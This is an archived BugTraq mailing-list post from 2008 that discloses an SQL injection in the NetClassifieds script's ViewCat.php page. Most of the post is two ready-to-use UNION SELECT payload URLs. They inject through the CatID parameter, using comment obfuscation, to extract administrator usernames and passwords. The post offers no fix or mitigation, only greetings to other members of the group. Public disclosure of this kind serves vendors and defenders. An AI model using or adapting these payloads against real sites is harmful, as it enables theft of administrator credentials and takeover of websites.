BugTraq
NetClassifieds Sql Injection Apr 23 2008 01:12AM
noreply aria-security com
Aria-Security Team (Persian Security Team)

http://Aria-Security.Net (Persian)

http://Aria-Security.com (ENG)

--------------------------------------------

Greetz: Aura, imm02tal, Null, Kinglet, Mormoroth

http://www.scriptdevelopers.net/ (tested on NetClassifieds)

Original Post @ http://forum.aria-security.com/showthread.php?p=107#

ViewCat.php?CatID=-1/**/union/**/select/**/1,username,3/**/from/**/admin
istrators/*

ViewCat.php?CatID=-1/**/union/**/select/**/1,2,user_passowrd/**/from/**/
administrators/*

Note: other NetClassfields Product maybe vulnerable with the same vuln.

Regards,

The-0utl4w

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus